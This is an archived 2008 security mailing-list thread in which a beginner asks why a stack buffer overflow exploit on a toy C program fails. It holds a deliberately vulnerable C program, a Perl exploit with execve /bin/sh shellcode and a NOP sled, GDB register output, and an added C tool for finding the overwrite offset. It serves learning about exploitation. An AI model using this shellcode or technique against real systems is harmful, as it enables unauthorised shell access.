Re: Simple Buffer Overflow

From: Sanjay R (2sanjayr@gmail.com)
Date: Sun Jan 13 2008 - 22:57:38 EST


Hi:
Before writing your exploit code, you should check the length of the
buffer that will overwrite EIP. As you mentioned you are a beginner
(like me!!), I advise you to always follow a step-by-step approach. Once
you gain expertise, play with it as much as you like. So you need to
do:
1. Pass a randomly large string (1000 chars, made up of unique 4-char groups).
2. On getting the segmentation fault, see the address in GDB.
3. Since we have taken unique substrings of length 4, you will be
able to find the substring (the 4 chars that overwrite EIP). Count the
chars.
4. Now write your exploit code.

-sanjay

On 10 Jan 2008 02:09:46 -0000, <loki6@orange.nl> wrote:
> Hi there and thank you for reading this,
>
>
> I'm new to the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.
>
> As I've said, I'm new to this field and my goal is to be able to anticipate possible buffer overflow exploits.
>
> I've created this simple script, "test.c":
>
>
> [code]
> #include <stdio.h>
> #include <string.h>   /* strcpy() needs this; missing from the original */
>
> int main(int argc, char **argv)
> {
>     char buffer[256];
>
>     if (argc == 1) {
>         printf("Usage: %s (input)\n", argv[0]);
>         return 1;     /* without this, strcpy() below is reached with argv[1] == NULL */
>     }
>
>     /* Unbounded copy into a 256-byte stack buffer: the deliberate overflow under study */
>     strcpy(buffer, argv[1]);
>
>     /* User input used as the format string: a separate (format string) bug, left as posted */
>     printf(buffer);
>
>     return 0;
> }
> [/code]
>
>
>
>
> Then I'm trying to exploit it with:
>
> [code]
> #!/usr/bin/perl
>
> # Return address, written little-endian. The original had forward slashes
> # ("/x90/x9a/xbf"), which Perl treats as literal text rather than bytes;
> # it is also only three bytes long as posted.
> $ret = "\x90\x9a\xbf";
>
> # execve("/bin//sh") shellcode; contains no NUL bytes, so strcpy() copies all of it.
> # Assumes the upper bytes of eax are already zero when "mov al, 0x0b" runs.
> $shellcode = "\xb0\x0b".               # mov  al, 0x0b   (sys_execve)
>              "\x99".                   # cdq             (edx = 0)
>              "\x52".                   # push edx        (NUL terminator)
>              "\x68\x2f\x2f\x73\x68".   # push "//sh"
>              "\x68\x2f\x62\x69\x6e".   # push "/bin"
>              "\x89\xe3".               # mov  ebx, esp   (ebx -> "/bin//sh")
>              "\x52".                   # push edx        (envp = NULL)
>              "\x53".                   # push ebx        (argv[0])
>              "\x89\xe1".               # mov  ecx, esp   (ecx -> argv)
>              "\xcd\x80";               # int  0x80
>
> $exploit  = "\x90" x 235;   # NOP sled
> $exploit .= $shellcode;
> $exploit .= $ret;
>
> # List form of system(): the bytes go straight into argv[1] without passing through a shell
> system("./a.out", $exploit);
> [/code]
>
>
>
> The shellcode is an execve /bin/sh.
>
> When I run the perl script it simply returns my bash prompt, so the exploit didn't work.
>
> When I type 'exit' afterwards, I'm dropped out of the su shell I was in previously, confirming there isn't a "/bin/sh" process.
>
>
> Now the funny thing is, when I overflow the buffer of a.out in gdb with:
>
> run `perl -e 'print "A"x262'`
>
> Program received signal SIGSEGV, Segmentation fault
> 0x08048412 in main ()
>
> It doesn't overflow the EIP, because when I use:
>
> i r
>
> It says:
>
> eip 0x8048412 0x8048412 <main+126>
>
> The first time I tried today it overflowed the EIP correctly and I didn't change anything.
>
> ECX is 0x41414141,
> ESP is 0x4141413d and
> EBP is 0xbf004141.
>
> Since the stack and frame pointers both have 41 in them, I figure part of them is overflowed. Why not the Extended Instruction Pointer?
>
>
> I was wondering if someone was able to help me with this, because I really want to get the hang of this.
>
> I don't know if I got the NOP sled and return address right either, because when using GDB:
>
> x/s $esp
>
> I get:
>
> 0x4141413d: <Address 0x4141413d out of bounds>
>
> I'm kinda stuck from there.
>
>
> My problem in short:
>
>
> - How do I get a reliable return address with GDB
>
> - How do I determine the length of the NOP sled
>
> - How do I test shellcode
>
>
>
> Thanks for reading this..
>
> Thanks for any help, pointers and advice.
>
>
> ironmonkey6
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>
>

-- 
Computer Security Learner
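An added example of the unique-4-char-group method described in the reply above (this is not code from either poster): a small C tool that builds a Metasploit-style cyclic pattern ("Aa0Aa1Aa2...") and maps the value GDB reports in EIP back to its offset in that pattern. The pattern format, the program name ./pattern and the sample register value 0x37694136 are assumptions made for illustration; the lookup assumes an x86 (little-endian) target like the one in the original post.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/*
 * Build a cyclic pattern "Aa0Aa1Aa2...Ab0Ab1...": a sequence of 3-byte
 * groups (upper, lower, digit) in which every 4-byte window is unique for
 * the first 26*26*10*3 = 20280 bytes. Writes up to len bytes plus a NUL
 * into out (so out needs len+1 bytes) and returns the bytes written.
 */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char group[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = group[i];
            }
    out[n] = '\0';
    return n;
}

/*
 * Given the 32-bit value GDB shows for a register after the crash
 * (e.g. "eip 0x37694136"), return the offset in the pattern of the four
 * bytes that landed in it, or -1 if not found. x86 is little-endian, so
 * the register's least significant byte is the first byte written to
 * that stack slot.
 */
long pattern_offset(const char *pat, size_t len, uint32_t reg)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((reg >> (8 * i)) & 0xffu);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Convenience wrapper: build a len-byte pattern and look one register value up in it. */
long find_offset(size_t len, uint32_t reg)
{
    char *pat = malloc(len + 1);
    if (!pat)
        return -1;
    pattern_create(pat, len);
    long off = pattern_offset(pat, len, reg);
    free(pat);
    return off;
}

/*
 * Hypothetical invocation:
 *   ./pattern 1000               prints the 1000-byte pattern to use as argv[1]
 *   ./pattern 1000 0x37694136    prints the offset of that EIP value (260)
 * The offset is the number of bytes that precede the return address slot,
 * i.e. the padding the exploit needs before $ret.
 */
int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <length> [register-value-hex]\n", argv[0]);
        return 1;
    }
    size_t len = strtoul(argv[1], NULL, 10);
    if (len == 0 || len > 20280) {
        fprintf(stderr, "length must be 1..20280 for unique 4-byte windows\n");
        return 1;
    }
    if (argc == 2) {
        char *pat = malloc(len + 1);
        if (!pat)
            return 1;
        pattern_create(pat, len);
        fputs(pat, stdout);
        free(pat);
        return 0;
    }
    uint32_t reg = (uint32_t)strtoul(argv[2], NULL, 16);
    long off = find_offset(len, reg);
    if (off < 0)
        printf("0x%08x not found in pattern\n", reg);
    else
        printf("0x%08x is at offset %ld\n", reg, off);
    return 0;
}
```

gdb's run command passes its arguments through the shell, so `run $(./pattern 1000)` feeds the pattern to the target the same way the original post fed the "A"x262 string. After the SIGSEGV, take the value from `i r eip` and pass it as the second argument; the same lookup works for the bytes that land in EBP or ESP, which is useful when EIP itself is not overwritten.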


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT